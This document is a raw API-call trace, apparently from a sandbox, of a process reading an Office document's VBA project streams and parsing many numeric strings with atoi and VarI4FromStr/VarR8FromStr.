GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ü", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.968] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ý", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.969] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Þ", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.969] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ß", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.969] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="à", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.969] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="á", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.969] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="â", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.969] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ã", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.969] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ä", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.969] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="å", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.969] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="æ", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.969] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ç", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.969] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="è", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.970] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="é", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.970] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ê", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.970] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ë", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.970] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ì", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.970] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="í", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.970] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="î", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.970] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ï", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.970] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ð", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.971] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ñ", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.971] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ò", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.971] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ó", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.971] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ô", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.971] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="õ", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.971] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ö", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.971] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="÷", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.972] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ø", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.972] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ù", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.972] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ú", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.972] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="û", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.972] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ü", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.972] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ý", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.972] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="þ", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.972] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ÿ", cchSrc=1, lpCharType=0x347d20 | out: lpCharType=0x347d20) returned 1 [0058.972] CRetailMalloc_Alloc () returned 0x87fc0b0 [0058.973] CRetailMalloc_Alloc () returned 0x88112f8 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x87fc0b0, cbMultiByte=13, lpWideCharStr=0x88112f8, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0058.973] CRetailMalloc_Free () returned 0x6350301 [0058.973] CRetailMalloc_Free () returned 0x3590501 [0058.973] CRetailMalloc_Alloc () returned 0x8750160 [0058.973] CRetailMalloc_Alloc () returned 0x8804510 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8750160, cbMultiByte=21, lpWideCharStr=0x8804510, cchWideChar=21 | out: lpWideCharStr="1Normal.ThisDocument") returned 21 [0058.973] CRetailMalloc_Alloc () returned 0x88044a0 [0058.974] CRetailMalloc_Realloc () returned 0x87fc0b0 [0058.974] CRetailMalloc_Realloc () returned 0x86bad10 [0058.974] CRetailMalloc_Free () returned 0xc6a0401 [0058.974] CRetailMalloc_Free () returned 0x6920101 [0058.981] CExposedStream::Read () returned 0x0 [0058.981] CRetailMalloc_Realloc () returned 0x887b7c0 [0058.981] CExposedStream::Release () returned 0x1 [0058.981] CExposedStream::Release () returned 0x0 [0058.984] CRetailMalloc_Realloc () returned 0x86e5f98 [0058.984] CRetailMalloc_Alloc () returned 0x8841eb8 [0058.984] CRetailMalloc_Alloc () returned 0x6178e78 [0058.984] CRetailMalloc_Alloc () returned 0x867bc18 [0058.985] CRetailMalloc_Realloc () returned 0x883de10 [0058.985] CRetailMalloc_Realloc () returned 0x86bad40 [0058.985] CRetailMalloc_Realloc () returned 0x87fc260 [0058.985] CRetailMalloc_Alloc () returned 0x87237b0 [0058.985] CRetailMalloc_Free () returned 0x920001 [0058.985] CRetailMalloc_Alloc () returned 0x88112f8 [0058.985] CRetailMalloc_Realloc () returned 0x87eb968 [0058.986] CRetailMalloc_Free () returned 0x6f20001 [0058.986] CRetailMalloc_Alloc () returned 0x88515b8 [0058.986] CRetailMalloc_Alloc () returned 0x88112f8 [0058.986] CRetailMalloc_Alloc () returned 0x87fbfd8 [0058.986] CRetailMalloc_Alloc () returned 0x87eb9f0 [0058.986] CRetailMalloc_Alloc () returned 0x86e5fa8 [0058.986] CRetailMalloc_Alloc () returned 0x86e5fc8 [0058.986] CRetailMalloc_Alloc () returned 0x876cb38 [0058.987] CRetailMalloc_Free () returned 0x1c0001 [0058.987] CExposedDocFile::AddRef () returned 0x4 [0058.987] CExposedDocFile::OpenStream () returned 0x0 [0058.987] CExposedDocFile::Release () returned 0x4 [0058.987] CExposedStream::Seek () returned 0x0 [0058.987] CRetailMalloc_Alloc () returned 0x887eab8 [0058.987] CRetailMalloc_Alloc () returned 0x87eba78 [0058.987] CRetailMalloc_Alloc () returned 0x887f0d8 [0058.987] CRetailMalloc_Alloc () returned 0x8811208 [0058.988] CRetailMalloc_Alloc () returned 0x86e5f88 [0058.988] CRetailMalloc_Alloc () returned 0x86e5fd8 [0058.988] CRetailMalloc_Alloc () returned 0x8811280 [0058.988] CRetailMalloc_Alloc () returned 0x87ebb00 [0058.988] CExposedStream::AddRef () returned 0x2 [0058.988] CExposedStream::Read () returned 0x0 [0058.988] CExposedStream::AddRef () returned 0x3 [0058.988] CExposedStream::Release () returned 0x2 [0058.988] CRetailMalloc_Alloc () returned 0x887f4f0 [0058.989] CExposedStream::Read () returned 0x0 [0058.989] CExposedStream::Read () returned 0x0 [0058.990] CRetailMalloc_Alloc () returned 0x86e5fe8 [0058.991] CRetailMalloc_Alloc () returned 0x87fc428 [0058.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x86e5fe8, cbMultiByte=8, lpWideCharStr=0x87fc428, cchWideChar=8 | out: lpWideCharStr="B3BemS4") returned 8 [0058.991] CRetailMalloc_Free () returned 0x3a00201 [0058.991] CRetailMalloc_Free () returned 0x6020301 [0058.991] CRetailMalloc_Realloc () returned 0x8750100 [0058.994] atoi (_Str="244") returned 244 [0058.994] atoi (_Str="70") returned 70 [0058.995] atoi (_Str="476") returned 476 [0059.010] atoi (_Str="469") returned 469 [0059.011] atoi (_Str="0") returned 0 [0059.012] atoi (_Str="6750") returned 6750 [0059.012] atoi (_Str="270") returned 270 [0059.012] atoi (_Str="476") returned 476 [0059.012] atoi (_Str="469") returned 469 [0059.013] CRetailMalloc_Realloc () returned 0x779d1d8 [0059.014] atoi (_Str="131") returned 131 [0059.014] atoi (_Str="6750") returned 6750 [0059.015] atoi (_Str="270") returned 270 [0059.015] atoi (_Str="476") returned 476 [0059.015] atoi (_Str="469") returned 469 [0059.016] atoi (_Str="555") returned 555 [0059.016] atoi (_Str="530") returned 530 [0059.036] VarI4FromStr (in: strIn="608268988", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.042] VarI4FromStr (in: strIn="18088", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.042] atoi (_Str="323") returned 323 [0059.042] CRetailMalloc_Realloc () returned 0x87161d8 [0059.043] atoi (_Str="6750") returned 6750 [0059.043] atoi (_Str="270") returned 270 [0059.043] atoi (_Str="476") returned 476 [0059.043] atoi (_Str="469") returned 469 [0059.043] atoi (_Str="252") returned 252 [0059.044] atoi (_Str="555") returned 555 [0059.044] atoi (_Str="530") returned 530 [0059.045] VarI4FromStr (in: strIn="18088", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.045] atoi (_Str="323") returned 323 [0059.046] atoi (_Str="903") returned 903 [0059.046] atoi (_Str="882") returned 882 [0059.046] atoi (_Str="3394") returned 3394 [0059.046] atoi (_Str="3403") returned 3403 [0059.047] atoi (_Str="774") returned 774 [0059.047] atoi (_Str="792") returned 792 [0059.047] atoi (_Str="9761") returned 9761 [0059.047] atoi (_Str="227") returned 227 [0059.048] atoi (_Str="0") returned 0 [0059.048] atoi (_Str="903") returned 903 [0059.049] atoi (_Str="882") returned 882 [0059.049] atoi (_Str="3394") returned 3394 [0059.049] atoi (_Str="3403") returned 3403 [0059.049] CRetailMalloc_Realloc () returned 0x6210680 [0059.050] VarR8FromStr (in: strIn="42560.063786472", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.050] VarR4FromR8 (in: dblIn=0xa89ed65, pfltOut=0x40e4c802 | out: pfltOut=0x40e4c802) returned 0x0 [0059.050] atoi (_Str="774") returned 774 [0059.050] atoi (_Str="792") returned 792 [0059.050] atoi (_Str="221") returned 221 [0059.051] atoi (_Str="9761") returned 9761 [0059.051] atoi (_Str="227") returned 227 [0059.051] VarI4FromStr (in: strIn="1454499384", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.051] atoi (_Str="3452") returned 3452 [0059.051] atoi (_Str="4") returned 4 [0059.052] atoi (_Str="3394") returned 3394 [0059.052] atoi (_Str="3403") returned 3403 [0059.052] VarR8FromStr (in: strIn="61250.477737394", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.052] VarR4FromR8 (in: dblIn=0x499fee6a, pfltOut=0x40ede84f | out: pfltOut=0x40ede84f) returned 0x0 [0059.053] atoi (_Str="3452") returned 3452 [0059.053] atoi (_Str="4") returned 4 [0059.053] atoi (_Str="3394") returned 3394 [0059.053] atoi (_Str="3403") returned 3403 [0059.057] VarR8FromStr (in: strIn="17764.116521343", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.057] VarR4FromR8 (in: dblIn=0x7515ef5e, pfltOut=0x40d15907 | out: pfltOut=0x40d15907) returned 0x0 [0059.058] atoi (_Str="774") returned 774 [0059.058] atoi (_Str="792") returned 792 [0059.059] atoi (_Str="2956") returned 2956 [0059.059] atoi (_Str="4") returned 4 [0059.059] atoi (_Str="3064") returned 3064 [0059.059] atoi (_Str="383") returned 383 [0059.060] VarR8FromStr (in: strIn="44644.605613102", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.060] VarR4FromR8 (in: dblIn=0x612eba64, pfltOut=0x40e5cc93 | out: pfltOut=0x40e5cc93) returned 0x0 [0059.060] VarI4FromStr (in: strIn="10692", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.061] atoi (_Str="486") returned 486 [0059.062] VarI4FromStr (in: strIn="10843", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.062] VarI4FromStr (in: strIn="10843", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.063] atoi (_Str="3064") returned 3064 [0059.063] atoi (_Str="383") returned 383 [0059.063] atoi (_Str="27") returned 27 [0059.063] VarI4FromStr (in: strIn="10692", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.063] atoi (_Str="486") returned 486 [0059.064] CRetailMalloc_Realloc () returned 0x76fc6a8 [0059.064] VarI4FromStr (in: strIn="10843", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.064] VarI4FromStr (in: strIn="10843", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.065] atoi (_Str="3064") returned 3064 [0059.065] atoi (_Str="383") returned 383 [0059.066] VarI4FromStr (in: strIn="10692", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.066] atoi (_Str="486") returned 486 [0059.066] VarR8FromStr (in: strIn="63593.676543411", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.066] VarR4FromR8 (in: dblIn=0xa63e5e12, pfltOut=0x40ef0d35 | out: pfltOut=0x40ef0d35) returned 0x0 [0059.066] atoi (_Str="5") returned 5 [0059.067] atoi (_Str="9") returned 9 [0059.067] atoi (_Str="33") returned 33 [0059.067] atoi (_Str="33") returned 33 [0059.068] VarI4FromStr (in: strIn="10843", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.068] VarI4FromStr (in: strIn="10843", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.069] atoi (_Str="3064") returned 3064 [0059.069] atoi (_Str="383") returned 383 [0059.070] atoi (_Str="4253") returned 4253 [0059.070] atoi (_Str="4246") returned 4246 [0059.071] atoi (_Str="461") returned 461 [0059.071] atoi (_Str="450") returned 450 [0059.072] atoi (_Str="161") returned 161 [0059.074] atoi (_Str="4253") returned 4253 [0059.074] atoi (_Str="4246") returned 4246 [0059.075] atoi (_Str="461") returned 461 [0059.075] atoi (_Str="450") returned 450 [0059.076] VarR8FromStr (in: strIn="58387.359757158", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.076] VarR4FromR8 (in: dblIn=0x83217184, pfltOut=0x40ec826b | out: pfltOut=0x40ec826b) returned 0x0 [0059.076] atoi (_Str="544") returned 544 [0059.076] atoi (_Str="576") returned 576 [0059.076] atoi (_Str="249") returned 249 [0059.077] atoi (_Str="228") returned 228 [0059.077] atoi (_Str="165") returned 165 [0059.077] atoi (_Str="249") returned 249 [0059.078] VarR8FromStr (in: strIn="26059.78459727", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.078] VarR4FromR8 (in: dblIn=0x36d777cc, pfltOut=0x40d972f2 | out: pfltOut=0x40d972f2) returned 0x0 [0059.078] VarI4FromStr (in: strIn="29400", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.078] atoi (_Str="60") returned 60 [0059.079] atoi (_Str="461") returned 461 [0059.079] atoi (_Str="450") returned 450 [0059.080] atoi (_Str="244") returned 244 [0059.080] atoi (_Str="4253") returned 4253 [0059.080] atoi (_Str="4246") returned 4246 [0059.081] atoi (_Str="461") returned 461 [0059.081] atoi (_Str="450") returned 450 [0059.083] atoi (_Str="334") returned 334 [0059.083] atoi (_Str="232") returned 232 [0059.084] atoi (_Str="252") returned 252 [0059.084] atoi (_Str="21") returned 21 [0059.084] atoi (_Str="2006") returned 2006 [0059.084] VarI4FromStr (in: strIn="10319", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.084] atoi (_Str="607") returned 607 [0059.085] atoi (_Str="0") returned 0 [0059.085] atoi (_Str="288") returned 288 [0059.085] atoi (_Str="340") returned 340 [0059.085] atoi (_Str="202") returned 202 [0059.086] atoi (_Str="2006") returned 2006 [0059.087] atoi (_Str="356") returned 356 [0059.088] atoi (_Str="60") returned 60 [0059.088] atoi (_Str="252") returned 252 [0059.088] atoi (_Str="21") returned 21 [0059.088] VarR8FromStr (in: strIn="20618.930459363", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.089] VarR4FromR8 (in: dblIn=0x8ca56d96, pfltOut=0x40d422bb | out: pfltOut=0x40d422bb) returned 0x0 [0059.089] atoi (_Str="356") returned 356 [0059.089] atoi (_Str="60") returned 60 [0059.090] atoi (_Str="252") returned 252 [0059.092] atoi (_Str="21") returned 21 [0059.093] VarI4FromStr (in: strIn="22055", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.093] atoi (_Str="356") returned 356 [0059.094] atoi (_Str="60") returned 60 [0059.094] atoi (_Str="252") returned 252 [0059.094] atoi (_Str="21") returned 21 [0059.094] VarR8FromStr (in: strIn="47202.276616195", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.094] VarR4FromR8 (in: dblIn=0xda0a34e2, pfltOut=0x40e70c48 | out: pfltOut=0x40e70c48) returned 0x0 [0059.095] atoi (_Str="37") returned 37 [0059.095] atoi (_Str="3") returned 3 [0059.096] atoi (_Str="4795") returned 4795 [0059.096] atoi (_Str="4798") returned 4798 [0059.096] atoi (_Str="250") returned 250 [0059.096] atoi (_Str="220") returned 220 [0059.097] VarR8FromStr (in: strIn="4126.4389017858", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.097] VarR4FromR8 (in: dblIn=0x5bde102b, pfltOut=0x40b01e70 | out: pfltOut=0x40b01e70) returned 0x0 [0059.097] atoi (_Str="419") returned 419 [0059.097] atoi (_Str="355") returned 355 [0059.097] atoi (_Str="0") returned 0 [0059.098] CRetailMalloc_Realloc () returned 0x7426110 [0059.098] atoi (_Str="165") returned 165 [0059.098] atoi (_Str="63") returned 63 [0059.098] atoi (_Str="4795") returned 4795 [0059.099] atoi (_Str="4798") returned 4798 [0059.099] VarR8FromStr (in: strIn="1124.8454001614", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.099] VarR4FromR8 (in: dblIn=0xb09474fc, pfltOut=0x40919361 | out: pfltOut=0x40919361) returned 0x0 [0059.100] atoi (_Str="37") returned 37 [0059.100] atoi (_Str="3") returned 3 [0059.100] atoi (_Str="4795") returned 4795 [0059.101] atoi (_Str="4798") returned 4798 [0059.101] atoi (_Str="6540") returned 6540 [0059.101] atoi (_Str="37") returned 37 [0059.101] atoi (_Str="3") returned 3 [0059.102] atoi (_Str="4795") returned 4795 [0059.103] atoi (_Str="4798") returned 4798 [0059.103] atoi (_Str="161") returned 161 [0059.103] VarI4FromStr (in: strIn="27094", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.103] atoi (_Str="589") returned 589 [0059.104] atoi (_Str="252") returned 252 [0059.104] atoi (_Str="237") returned 237 [0059.104] VarR8FromStr (in: strIn="37832.761554568", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.104] VarR4FromR8 (in: dblIn=0x5ea7af76, pfltOut=0x40e27918 | out: pfltOut=0x40e27918) returned 0x0 [0059.104] VarI4FromStr (in: strIn="27094", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.105] atoi (_Str="589") returned 589 [0059.105] atoi (_Str="252") returned 252 [0059.105] atoi (_Str="237") returned 237 [0059.105] VarR8FromStr (in: strIn="56548.812322028", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.105] VarR4FromR8 (in: dblIn=0xfe8ac403, pfltOut=0x40eb9c99 | out: pfltOut=0x40eb9c99) returned 0x0 [0059.106] atoi (_Str="569") returned 569 [0059.106] atoi (_Str="538") returned 538 [0059.106] atoi (_Str="5671") returned 5671 [0059.106] VarI4FromStr (in: strIn="27094", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.108] atoi (_Str="589") returned 589 [0059.109] atoi (_Str="252") returned 252 [0059.109] atoi (_Str="237") returned 237 [0059.109] atoi (_Str="569") returned 569 [0059.110] atoi (_Str="538") returned 538 [0059.110] VarI4FromStr (in: strIn="27094", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.110] atoi (_Str="589") returned 589 [0059.110] atoi (_Str="252") returned 252 [0059.111] atoi (_Str="237") returned 237 [0059.111] atoi (_Str="569") returned 569 [0059.111] atoi (_Str="538") returned 538 [0059.113] VarI4FromStr (in: strIn="30132", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.113] atoi (_Str="486") returned 486 [0059.113] VarR8FromStr (in: strIn="47284.476017229", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.113] VarR4FromR8 (in: dblIn=0x3b887bdc, pfltOut=0x40e7168f | out: pfltOut=0x40e7168f) returned 0x0 [0059.113] atoi (_Str="888") returned 888 [0059.114] atoi (_Str="29") returned 29 [0059.114] atoi (_Str="252") returned 252 [0059.114] atoi (_Str="237") returned 237 [0059.114] VarR8FromStr (in: strIn="17466.439292798", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.114] VarR4FromR8 (in: dblIn=0x1d5f8a32, pfltOut=0x40d10e9c | out: pfltOut=0x40d10e9c) returned 0x0 [0059.115] atoi (_Str="289") returned 289 [0059.115] atoi (_Str="250") returned 250 [0059.115] atoi (_Str="1670") returned 1670 [0059.115] atoi (_Str="1657") returned 1657 [0059.115] atoi (_Str="5842") returned 5842 [0059.116] CExposedStream::Read () returned 0x0 [0059.116] CExposedStream::Read () returned 0x0 [0059.116] atoi (_Str="1000") returned 1000 [0059.116] atoi (_Str="972") returned 972 [0059.116] atoi (_Str="5842") returned 5842 [0059.117] atoi (_Str="462") returned 462 [0059.117] atoi (_Str="419") returned 419 [0059.118] VarI4FromStr (in: strIn="1110055254", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.119] VarR8FromStr (in: strIn="12407.255549873", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.119] VarR4FromR8 (in: dblIn=0xb5dbb584, pfltOut=0x40c83ba0 | out: pfltOut=0x40c83ba0) returned 0x0 [0059.119] atoi (_Str="289") returned 289 [0059.119] atoi (_Str="250") returned 250 [0059.120] atoi (_Str="1670") returned 1670 [0059.120] atoi (_Str="1657") returned 1657 [0059.120] VarI4FromStr (in: strIn="20818", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.121] atoi (_Str="289") returned 289 [0059.121] atoi (_Str="250") returned 250 [0059.121] atoi (_Str="1670") returned 1670 [0059.122] atoi (_Str="1657") returned 1657 [0059.123] VarR8FromStr (in: strIn="43112.340377987", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.123] VarR4FromR8 (in: dblIn=0xe460604e, pfltOut=0x40e50d0a | out: pfltOut=0x40e50d0a) returned 0x0 [0059.123] atoi (_Str="1000") returned 1000 [0059.123] atoi (_Str="972") returned 972 [0059.123] atoi (_Str="0") returned 0 [0059.124] atoi (_Str="462") returned 462 [0059.124] atoi (_Str="419") returned 419 [0059.124] atoi (_Str="217") returned 217 [0059.125] VarR8FromStr (in: strIn="7264.8822171394", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.125] VarR4FromR8 (in: dblIn=0xd8fb81b2, pfltOut=0x40bc60e1 | out: pfltOut=0x40bc60e1) returned 0x0 [0059.125] atoi (_Str="1542") returned 1542 [0059.125] atoi (_Str="2") returned 2 [0059.126] atoi (_Str="1670") returned 1670 [0059.126] atoi (_Str="1657") returned 1657 [0059.126] VarR8FromStr (in: strIn="9733.1520551151", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.126] VarR4FromR8 (in: dblIn=0x768ac146, pfltOut=0x40c30293 | out: pfltOut=0x40c30293) returned 0x0 [0059.127] atoi (_Str="1000") returned 1000 [0059.127] atoi (_Str="972") returned 972 [0059.128] VarI4FromStr (in: strIn="21073", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.129] atoi (_Str="289") returned 289 [0059.129] atoi (_Str="250") returned 250 [0059.130] atoi (_Str="1670") returned 1670 [0059.130] atoi (_Str="1657") returned 1657 [0059.130] atoi (_Str="1000") returned 1000 [0059.130] atoi (_Str="972") returned 972 [0059.131] VarI4FromStr (in: strIn="1779289912", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.131] atoi (_Str="462") returned 462 [0059.131] atoi (_Str="419") returned 419 [0059.131] VarI4FromStr (in: strIn="12816", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.132] atoi (_Str="825") returned 825 [0059.132] atoi (_Str="847") returned 847 [0059.136] atoi (_Str="187") returned 187 [0059.136] atoi (_Str="180") returned 180 [0059.137] atoi (_Str="134") returned 134 [0059.137] atoi (_Str="1639") returned 1639 [0059.137] atoi (_Str="1656") returned 1656 [0059.137] VarR8FromStr (in: strIn="5918.5715775865", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.137] VarR4FromR8 (in: dblIn=0x52e8a125, pfltOut=0x40b71e92 | out: pfltOut=0x40b71e92) returned 0x0 [0059.141] atoi (_Str="1610") returned 1610 [0059.141] atoi (_Str="5") returned 5 [0059.141] atoi (_Str="187") returned 187 [0059.141] atoi (_Str="180") returned 180 